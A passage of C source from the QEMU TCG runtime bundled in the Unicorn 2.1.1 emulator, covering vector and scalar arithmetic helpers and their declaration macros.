sizeof(uint8_t)) { uint8_t sh = *(uint8_t *)((char *)b + i) & 7; *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr16v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { uint8_t sh = *(uint16_t *)((char *)b + i) & 15; *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr32v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint8_t sh = *(uint32_t *)((char *)b + i) & 31; *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr64v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint8_t sh = *(uint64_t *)((char *)b + i) & 63; *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar8v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { uint8_t sh = *(uint8_t *)((char *)b + i) & 7; *(int8_t *)((char *)d + i) = *(int8_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar16v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { uint8_t sh = *(uint16_t *)((char *)b 
+ i) & 15; *(int16_t *)((char *)d + i) = *(int16_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar32v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { uint8_t sh = *(uint32_t *)((char *)b + i) & 31; *(int32_t *)((char *)d + i) = *(int32_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar64v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { uint8_t sh = *(uint64_t *)((char *)b + i) & 63; *(int64_t *)((char *)d + i) = *(int64_t *)((char *)a + i) >> sh; } clear_high(d, oprsz, desc); } #define DO_CMP1(NAME, TYPE, OP) \ void HELPER(NAME)(void *d, void *a, void *b, uint32_t desc) \ { \ intptr_t oprsz = simd_oprsz(desc); \ intptr_t i; \ for (i = 0; i < oprsz; i += sizeof(TYPE)) { \ *(TYPE *)((char *)d + i) = -(*(TYPE *)((char *)a + i) OP *(TYPE *)((char *)b + i)); \ } \ clear_high(d, oprsz, desc); \ } #define DO_CMP2(SZ) \ DO_CMP1(gvec_eq##SZ, uint##SZ##_t, ==) \ DO_CMP1(gvec_ne##SZ, uint##SZ##_t, !=) \ DO_CMP1(gvec_lt##SZ, int##SZ##_t, <) \ DO_CMP1(gvec_le##SZ, int##SZ##_t, <=) \ DO_CMP1(gvec_ltu##SZ, uint##SZ##_t, <) \ DO_CMP1(gvec_leu##SZ, uint##SZ##_t, <=) DO_CMP2(8) DO_CMP2(16) DO_CMP2(32) DO_CMP2(64) #undef DO_CMP1 #undef DO_CMP2 void HELPER(gvec_ssadd8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { int r = *(int8_t *)((char *)a + i) + *(int8_t *)((char *)b + i); if (r > INT8_MAX) { r = INT8_MAX; } else if (r < INT8_MIN) { r = INT8_MIN; } *(int8_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_ssadd16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int r = *(int16_t *)((char *)a + i) + *(int16_t *)((char *)b + i); if (r > INT16_MAX) { r = INT16_MAX; } else if (r < INT16_MIN) { r = INT16_MIN; } *(int16_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_ssadd32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t ai = *(int32_t *)((char *)a + i); int32_t bi = *(int32_t *)((char *)b + i); int32_t di = ai + bi; if (((di ^ ai) &~ (ai ^ bi)) < 0) { /* Signed overflow. */ di = (di < 0 ? INT32_MAX : INT32_MIN); } *(int32_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_ssadd64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t ai = *(int64_t *)((char *)a + i); int64_t bi = *(int64_t *)((char *)b + i); int64_t di = ai + bi; if (((di ^ ai) &~ (ai ^ bi)) < 0) { /* Signed overflow. */ di = (di < 0 ? 
INT64_MAX : INT64_MIN); } *(int64_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_sssub8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { int r = *(int8_t *)((char *)a + i) - *(int8_t *)((char *)b + i); if (r > INT8_MAX) { r = INT8_MAX; } else if (r < INT8_MIN) { r = INT8_MIN; } *(uint8_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_sssub16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int r = *(int16_t *)((char *)a + i) - *(int16_t *)((char *)b + i); if (r > INT16_MAX) { r = INT16_MAX; } else if (r < INT16_MIN) { r = INT16_MIN; } *(int16_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_sssub32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t ai = *(int32_t *)((char *)a + i); int32_t bi = *(int32_t *)((char *)b + i); int32_t di = ai - bi; if (((di ^ ai) & (ai ^ bi)) < 0) { /* Signed overflow. */ di = (di < 0 ? INT32_MAX : INT32_MIN); } *(int32_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_sssub64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t ai = *(int64_t *)((char *)a + i); int64_t bi = *(int64_t *)((char *)b + i); int64_t di = ai - bi; if (((di ^ ai) & (ai ^ bi)) < 0) { /* Signed overflow. */ di = (di < 0 ? INT64_MAX : INT64_MIN); } *(int64_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_usadd8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { unsigned r = *(uint8_t *)((char *)a + i) + *(uint8_t *)((char *)b + i); if (r > UINT8_MAX) { r = UINT8_MAX; } *(uint8_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_usadd16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { unsigned r = *(uint16_t *)((char *)a + i) + *(uint16_t *)((char *)b + i); if (r > UINT16_MAX) { r = UINT16_MAX; } *(uint16_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_usadd32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint32_t ai = *(uint32_t *)((char *)a + i); uint32_t bi = *(uint32_t *)((char *)b + i); uint32_t di = ai + bi; if (di < ai) { di = UINT32_MAX; } *(uint32_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_usadd64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t ai = *(uint64_t *)((char *)a + i); uint64_t bi = *(uint64_t *)((char *)b + i); uint64_t di = ai + bi; if (di < ai) { di = UINT64_MAX; } *(uint64_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_ussub8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { int r = *(uint8_t *)((char *)a + i) - *(uint8_t *)((char *)b + i); if (r < 0) { r = 0; } *(uint8_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_ussub16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = 
simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { int r = *(uint16_t *)((char *)a + i) - *(uint16_t *)((char *)b + i); if (r < 0) { r = 0; } *(uint16_t *)((char *)d + i) = r; } clear_high(d, oprsz, desc); } void HELPER(gvec_ussub32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint32_t ai = *(uint32_t *)((char *)a + i); uint32_t bi = *(uint32_t *)((char *)b + i); uint32_t di = ai - bi; if (ai < bi) { di = 0; } *(uint32_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_ussub64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t ai = *(uint64_t *)((char *)a + i); uint64_t bi = *(uint64_t *)((char *)b + i); uint64_t di = ai - bi; if (ai < bi) { di = 0; } *(uint64_t *)((char *)d + i) = di; } clear_high(d, oprsz, desc); } void HELPER(gvec_smin8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { int8_t aa = *(int8_t *)((char *)a + i); int8_t bb = *(int8_t *)((char *)b + i); int8_t dd = aa < bb ? aa : bb; *(int8_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smin16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int16_t aa = *(int16_t *)((char *)a + i); int16_t bb = *(int16_t *)((char *)b + i); int16_t dd = aa < bb ? aa : bb; *(int16_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smin32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t aa = *(int32_t *)((char *)a + i); int32_t bb = *(int32_t *)((char *)b + i); int32_t dd = aa < bb ? aa : bb; *(int32_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smin64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t aa = *(int64_t *)((char *)a + i); int64_t bb = *(int64_t *)((char *)b + i); int64_t dd = aa < bb ? aa : bb; *(int64_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smax8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { int8_t aa = *(int8_t *)((char *)a + i); int8_t bb = *(int8_t *)((char *)b + i); int8_t dd = aa > bb ? aa : bb; *(int8_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smax16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int16_t aa = *(int16_t *)((char *)a + i); int16_t bb = *(int16_t *)((char *)b + i); int16_t dd = aa > bb ? aa : bb; *(int16_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smax32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t aa = *(int32_t *)((char *)a + i); int32_t bb = *(int32_t *)((char *)b + i); int32_t dd = aa > bb ? 
aa : bb; *(int32_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_smax64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t aa = *(int64_t *)((char *)a + i); int64_t bb = *(int64_t *)((char *)b + i); int64_t dd = aa > bb ? aa : bb; *(int64_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umin8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { uint8_t aa = *(uint8_t *)((char *)a + i); uint8_t bb = *(uint8_t *)((char *)b + i); uint8_t dd = aa < bb ? aa : bb; *(uint8_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umin16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { uint16_t aa = *(uint16_t *)((char *)a + i); uint16_t bb = *(uint16_t *)((char *)b + i); uint16_t dd = aa < bb ? aa : bb; *(uint16_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umin32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint32_t aa = *(uint32_t *)((char *)a + i); uint32_t bb = *(uint32_t *)((char *)b + i); uint32_t dd = aa < bb ? aa : bb; *(uint32_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umin64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t aa = *(uint64_t *)((char *)a + i); uint64_t bb = *(uint64_t *)((char *)b + i); uint64_t dd = aa < bb ? aa : bb; *(uint64_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umax8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { uint8_t aa = *(uint8_t *)((char *)a + i); uint8_t bb = *(uint8_t *)((char *)b + i); uint8_t dd = aa > bb ? aa : bb; *(uint8_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umax16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { uint16_t aa = *(uint16_t *)((char *)a + i); uint16_t bb = *(uint16_t *)((char *)b + i); uint16_t dd = aa > bb ? aa : bb; *(uint16_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umax32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint32_t aa = *(uint32_t *)((char *)a + i); uint32_t bb = *(uint32_t *)((char *)b + i); uint32_t dd = aa > bb ? aa : bb; *(uint32_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_umax64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t aa = *(uint64_t *)((char *)a + i); uint64_t bb = *(uint64_t *)((char *)b + i); uint64_t dd = aa > bb ? 
aa : bb; *(uint64_t *)((char *)d + i) = dd; } clear_high(d, oprsz, desc); } void HELPER(gvec_bitsel)(void *d, void *a, void *b, void *c, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t aa = *(uint64_t *)((char *)a + i); uint64_t bb = *(uint64_t *)((char *)b + i); uint64_t cc = *(uint64_t *)((char *)c + i); *(uint64_t *)((char *)d + i) = (bb & aa) | (cc & ~aa); } clear_high(d, oprsz, desc); }
unicorn-2.1.1/qemu/accel/tcg/tcg-runtime.c
/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. 
*/ #include "qemu/osdep.h" #include "qemu/host-utils.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/cpu_ldst.h" #include "exec/exec-all.h" #include "exec/tb-lookup.h" #include "tcg/tcg.h" #include <uc_priv.h> /* 32-bit helpers */ int32_t HELPER(div_i32)(int32_t arg1, int32_t arg2) { return arg1 / arg2; } int32_t HELPER(rem_i32)(int32_t arg1, int32_t arg2) { return arg1 % arg2; } uint32_t HELPER(divu_i32)(uint32_t arg1, uint32_t arg2) { return arg1 / arg2; } uint32_t HELPER(remu_i32)(uint32_t arg1, uint32_t arg2) { return arg1 % arg2; } /* 64-bit helpers */ uint64_t HELPER(shl_i64)(uint64_t arg1, uint64_t arg2) { return arg1 << arg2; } uint64_t HELPER(shr_i64)(uint64_t arg1, uint64_t arg2) { return arg1 >> arg2; } int64_t HELPER(sar_i64)(int64_t arg1, int64_t arg2) { return arg1 >> arg2; } int64_t HELPER(div_i64)(int64_t arg1, int64_t arg2) { return arg1 / arg2; } int64_t HELPER(rem_i64)(int64_t arg1, int64_t arg2) { return arg1 % arg2; } uint64_t HELPER(divu_i64)(uint64_t arg1, uint64_t arg2) { return arg1 / arg2; } uint64_t HELPER(remu_i64)(uint64_t arg1, uint64_t arg2) { return arg1 % arg2; } uint64_t HELPER(muluh_i64)(uint64_t arg1, uint64_t arg2) { uint64_t l, h; mulu64(&l, &h, arg1, arg2); return h; } int64_t HELPER(mulsh_i64)(int64_t arg1, int64_t arg2) { uint64_t l, h; muls64(&l, &h, arg1, arg2); return h; } uint32_t HELPER(clz_i32)(uint32_t arg, uint32_t zero_val) { return arg ? clz32(arg) : zero_val; } uint32_t HELPER(ctz_i32)(uint32_t arg, uint32_t zero_val) { return arg ? ctz32(arg) : zero_val; } uint64_t HELPER(clz_i64)(uint64_t arg, uint64_t zero_val) { return arg ? clz64(arg) : zero_val; } uint64_t HELPER(ctz_i64)(uint64_t arg, uint64_t zero_val) { return arg ? ctz64(arg) : zero_val; } uint32_t HELPER(clrsb_i32)(uint32_t arg) { return clrsb32(arg); } uint64_t HELPER(clrsb_i64)(uint64_t arg) { return clrsb64(arg); } uint32_t HELPER(ctpop_i32)(uint32_t arg) { return ctpop32(arg); } uint64_t HELPER(ctpop_i64)(uint64_t arg) { return ctpop64(arg); } void *HELPER(lookup_tb_ptr)(CPUArchState *env) { CPUState *cpu = env_cpu(env); TranslationBlock *tb; target_ulong cs_base, pc; uint32_t flags; struct uc_struct *uc = (struct uc_struct *)cpu->uc; tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, curr_cflags()); if (tb == NULL) { return uc->tcg_ctx->code_gen_epilogue; } return tb->tc.ptr; } void HELPER(exit_atomic)(CPUArchState *env) { cpu_loop_exit_atomic(env_cpu(env), GETPC()); }
unicorn-2.1.1/qemu/accel/tcg/tcg-runtime.h
DEF_HELPER_FLAGS_2(div_i32, TCG_CALL_NO_RWG_SE, s32, s32, s32) DEF_HELPER_FLAGS_2(rem_i32, TCG_CALL_NO_RWG_SE, s32, s32, s32) DEF_HELPER_FLAGS_2(divu_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(remu_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) 
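/*
 * Each DEF_HELPER_FLAGS_n(NAME, FLAGS, ret, args...) entry declares a
 * runtime helper callable from TCG-generated code; the implementations
 * live in tcg-runtime.c and tcg-runtime-gvec.c above. TCG_CALL_NO_RWG_SE
 * marks a helper that neither reads nor writes guest memory and has no
 * other side effects, so the optimizer may hoist or eliminate the call.
 * As an illustration, the div_i32 entry above declares the prototype
 *     int32_t helper_div_i32(int32_t arg1, int32_t arg2);
 * which HELPER(div_i32) in tcg-runtime.c expands to.
 */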
DEF_HELPER_FLAGS_2(div_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_2(rem_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_2(divu_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(remu_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(shl_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(shr_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(sar_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_2(mulsh_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_2(muluh_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(clz_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(ctz_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(clz_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(ctz_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_1(clrsb_i32, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(clrsb_i64, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(ctpop_i32, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(ctpop_i64, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(lookup_tb_ptr, TCG_CALL_NO_WG_SE, ptr, env) DEF_HELPER_FLAGS_1(exit_atomic, TCG_CALL_NO_WG, noreturn, env) DEF_HELPER_FLAGS_5(atomic_cmpxchgb, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgw_be, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgw_le, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgl_be, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgl_le, TCG_CALL_NO_WG, i32, env, tl, i32, i32, i32) #ifdef CONFIG_ATOMIC64 DEF_HELPER_FLAGS_5(atomic_cmpxchgq_be, TCG_CALL_NO_WG, i64, env, tl, i64, i64, i32) DEF_HELPER_FLAGS_5(atomic_cmpxchgq_le, TCG_CALL_NO_WG, i64, env, tl, i64, i64, i32) #endif #ifdef CONFIG_ATOMIC64 #define GEN_ATOMIC_HELPERS(NAME) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), b), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), w_le), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), w_be), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), l_le), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), l_be), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), q_le), \ TCG_CALL_NO_WG, i64, env, tl, i64, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), q_be), \ TCG_CALL_NO_WG, i64, env, tl, i64, i32) #else #define GEN_ATOMIC_HELPERS(NAME) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), b), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), w_le), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), w_be), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), l_le), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) \ DEF_HELPER_FLAGS_4(glue(glue(atomic_, NAME), l_be), \ TCG_CALL_NO_WG, i32, env, tl, i32, i32) #endif /* CONFIG_ATOMIC64 */ GEN_ATOMIC_HELPERS(fetch_add) GEN_ATOMIC_HELPERS(fetch_and) GEN_ATOMIC_HELPERS(fetch_or) GEN_ATOMIC_HELPERS(fetch_xor) GEN_ATOMIC_HELPERS(fetch_smin) GEN_ATOMIC_HELPERS(fetch_umin) GEN_ATOMIC_HELPERS(fetch_smax) GEN_ATOMIC_HELPERS(fetch_umax) GEN_ATOMIC_HELPERS(add_fetch) GEN_ATOMIC_HELPERS(and_fetch) GEN_ATOMIC_HELPERS(or_fetch) GEN_ATOMIC_HELPERS(xor_fetch) GEN_ATOMIC_HELPERS(smin_fetch) GEN_ATOMIC_HELPERS(umin_fetch) GEN_ATOMIC_HELPERS(smax_fetch) 
GEN_ATOMIC_HELPERS(umax_fetch) GEN_ATOMIC_HELPERS(xchg) #undef GEN_ATOMIC_HELPERS DEF_HELPER_FLAGS_3(gvec_mov, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_dup8, TCG_CALL_NO_RWG, void, ptr, i32, i32) DEF_HELPER_FLAGS_3(gvec_dup16, TCG_CALL_NO_RWG, void, ptr, i32, i32) DEF_HELPER_FLAGS_3(gvec_dup32, TCG_CALL_NO_RWG, void, ptr, i32, i32) DEF_HELPER_FLAGS_3(gvec_dup64, TCG_CALL_NO_RWG, void, ptr, i32, i64) DEF_HELPER_FLAGS_4(gvec_add8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_add16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_add32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_add64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_adds8, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_adds16, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_adds32, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_adds64, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_sub8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sub16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sub32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sub64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_subs8, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_subs16, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_subs32, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) 